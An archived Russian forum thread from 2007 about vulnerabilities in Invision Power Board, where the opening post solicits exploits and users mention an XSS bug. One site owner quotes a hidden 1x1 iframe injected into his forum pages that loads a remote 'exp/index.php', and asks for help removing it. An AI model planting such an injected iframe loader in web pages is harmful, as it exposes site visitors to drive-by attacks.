1. Важное и срочное обновление IPB 3.4.5 - https://nulled.cc/threads/243375/

Поиск дырок в IPB.

Тема в разделе "IPB", создана пользователем pomor, 14 мар 2007.

Статус темы:
Закрыта.
Модераторы: Maybe
  1. pomor

    pomor Писатель

    Регистр.:
    19 фев 2007
    Сообщения:
    3
    Симпатии:
    0
    Все в курсе что дырки есть. Все заплатки что найдены на оффициальных стараницах уже поставил. Но я предполагаю, что это все появляется всегда с некоторым запозданием. Предлагаю поделиться експлойтами, не ради хака самого, но ради ну его к черту !
     
  2. ZAG

    ZAG Прохожие

    Это какая ? Судя по твоему сообщению ты про 2.2.2 говоришь..
    Баги есть во всех версиях, и будут всегда! Просто их находят само собой позже чем выходит сама версия.. Это необратимый процесс ) Весь вопрос в том кто быстрее найдет дыру, атакующий или защищающий ;)
     
  3. LEE_ROY

    LEE_ROY

    Регистр.:
    26 янв 2007
    Сообщения:
    205
    Симпатии:
    20
    угу, а баги скорее всего уже есть, просто будут сидеть в привате месяцок.. а потом на секлаб скинут, после поимения 90% бажных ипб.. ))
     
  4. muforum

    muforum Прохожие

    # for all - Моё мнение, что все должны понимать, что сама компания, которая разрабатывает IPB, сама же оставляет дыры, так как им же тоже надо, чтобы люди постоянно покупали новые версии...

    P.S. -> Если компания разработчиков сделаем всё один раз, то тогда кто будет покупать новые версии а ? =)
     
  5. punkz

    punkz Постоялец

    Регистр.:
    4 июл 2006
    Сообщения:
    66
    Симпатии:
    21
    могу сказать что есть сейчас xss в аяксовом изменение темы... т.е. использовать можно если ты модер на форуме... это на 2.1.х
     
  6. bratok

    bratok

    Регистр.:
    16 ноя 2006
    Сообщения:
    203
    Симпатии:
    47
    ребята, помогите советом

    обнаружил у себя на паре форумов во всех index.html и в index.php такой вот код

    <!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://XXXX.org/exp/index.php"></iframe><!-- ~ -->

    как я понял - это сделали через какуето дыру?

    1) что это за дыра?
    2) как ее закрыть?
    3) какой максимальный вред от этого кода? (понимаю что все зависит от кода в ифрейме)

    всем заранее спасибо

    ЗЫ проверьте и ваши ресурсы - наверняка найдете подобное
     
  7. EvilSven

    EvilSven Писатель

    Регистр.:
    2 фев 2007
    Сообщения:
    7
    Симпатии:
    0
    >>1) что это за дыра?

    это могло быть и не через дыру, а прийти вместе с нуленой версией

    >>3) какой максимальный вред от этого кода? (понимаю что все зависит от кода в ифрейме)

    открой этот адрес (_ttp://XXXX.org/exp/index.php) и посмотри что там будет. ;) Вполне возможно, что ты просто накручиваешь кому то показы
     
  8. AdeQuAte

    AdeQuAte

    Регистр.:
    23 мар 2007
    Сообщения:
    353
    Симпатии:
    45
    Это обсуждается уже давно, дело не в IPB. Подобные фреймы появляются в любых скриптах и проcто в HTML страницах. Антвирь молчит?
     
  9. tov_Me

    tov_Me Постоялец

    Регистр.:
    7 апр 2007
    Сообщения:
    93
    Симпатии:
    6
    Да нет. iframe может служить индикатором взлома, судя по ibresource.ru Встроенный в 2.1.7 антивирь вообще в основном по ифрейму проверяет. А дырку, через которое это могли замутить, проще всего определить по версии форума.
     
  10. toha

    toha

    Регистр.:
    8 июн 2006
    Сообщения:
    299
    Симпатии:
    26

    антивирь тут не показатель к сожалению
     
Статус темы:
Закрыта.